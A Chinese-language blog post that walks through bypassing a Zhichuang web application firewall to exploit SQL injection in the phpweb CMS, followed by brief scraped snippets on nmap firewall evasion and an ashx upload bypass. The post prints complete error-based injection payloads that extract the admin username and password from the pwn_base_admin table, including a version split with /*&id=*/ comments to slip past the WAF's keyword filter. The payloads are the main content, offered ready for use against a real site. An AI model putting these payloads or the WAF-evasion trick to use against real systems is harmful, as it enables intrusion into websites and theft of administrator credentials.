繞過智創防火牆,SQL注入phpweb

2021-12-29 21:58:59 字數 1661 閱讀 6099

今天**xiaoliumang發來乙個phpweb的站,然後就一起看了下。phpweb有注入漏洞的,之前說過。先加些語句看了下,可見有注入,而且可以報錯。雖然sql語句中我們提交的單引號變成了%27,但不要緊這是瀏覽器的事,待會用**直接提交就行了。

然後直接上利用語句

?116'/**/and(select/**/1/**/from(select/**/count(*),concat((select/**/(select/**/(select/**/concat(0x7e,0x27,pwn_base_admin.user,0x27,0x7e,pwn_base_admin.password,0x27,0x7e)/**/from/**/pwn_base_admin/**/limit/**/0,1))/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1.html

結果出現了智創的waf。 www.2cto.com

本來想直接放棄了的,最後還是霸王硬上弓了。思路是:

1、看看該waf攔截什麼語句,先依次提交select,union,from等關鍵字,然後再將這些sql關鍵字組合,最後發現只要有select from就會攔截,至於其他的匹配關鍵字和關鍵字組合沒有測試。

2、繞過首先想到的是轉換大小寫,結果沒用,一般waf都會轉換大小寫的;其次是編碼,但是在這裡phpweb直接是將語句拼接到sql查詢語句裡了,所以如果編碼的話即使可以繞過waf,也不會構造出有效的sql查詢語句。

3、試了試協議方面的,在get後面多加幾個空格,多加幾個問號,只要不是bad request的就試,結果這種get資料報可以變的地方比較少,也沒找到繞過方法。

4、直接說繞過思路吧,其實是利用了phpweb和waf的理解不一致。phpweb是將問號後面,.html前面的語句直接拼接到sql查詢語句中,不管編碼沒編碼、有沒有「=」,「&」(這兩個符號是http協議裡用來給引數賦值和分割引數的);而waf會將問號後面的根據http協議來進行解析。這樣的話,我們就可以用/*&id=*/來分割構造的sql語句來繞過waf了。最後構造語句如下:

/product/class/?id/*=*/abc'/**/and/**/(select/**/1/*&id=*/from(/*&id=*/select/**//*&id=*/count(*),/*&id=*/concat((/*&id=*/select/**/(/*&id=*/select/**/(/*&id=*/select/**//*&id=*/concat(0x7e,0x27,pwn_base_admin.user,0x27,0x7e,pwn_base_admin.password,0x27,0x7e)/**//*&id=*/from/**/pwn_base_admin/**/limit/**/0,1))/**//*&id=*/from/**/information_schema.tables/**//*&id=*/limit/**/0,1),/*&id=*/floor(rand(0)*2))x/**//*&id=*/from/**//*&id=*/information_schema.tables/**//*&id=*/group/**//*&id=*/by/**/x)a)/**//*&id=*/and/**//*&id=*/'1'='1.html 

如圖:

nmap繞過防火牆

1.發現防火牆 1 nmap sa 如果結果是filtered,那麼應該就是有防火牆 2 nmap badsum 事實上,所有主機都會丟棄錯誤checksum的資料報。如果收到響應,那麼可能是那些沒有檢查資料報的防火牆或ips。2.繞過防火牆 1 nmap ff 2 nmap f script fi...

Nmap繞過防火牆

1.碎片化 nmap傳送8個位元組的資料報繞過防火牆 ids ips。在防火牆配置不當的時候有用。nmap f host mtu,最大傳輸單元,它是碎片化的別名,我們可以指定它的大小 8的倍數 2.誘餌這種型別的掃瞄是非常隱蔽且無法察覺。目標由多個假冒或偽造ip位址進行掃瞄。這樣防火牆就會認為攻擊或...

ashx繞過防火牆

2.比較笨的方法,看 吧 我對 進行測試使用,防火牆依然檢查aspx字尾,pnig0s的 是上傳xx.jpg儲存的也是xx.jpg,xx.txt也是xx.txt,我的方法是做了乙個小的修改,偽原創。而且客戶端不用那麼麻煩。上傳任何型別檔案 防火牆不檢查的字尾 都會在服務端自動重新命名.看 吧 服務端...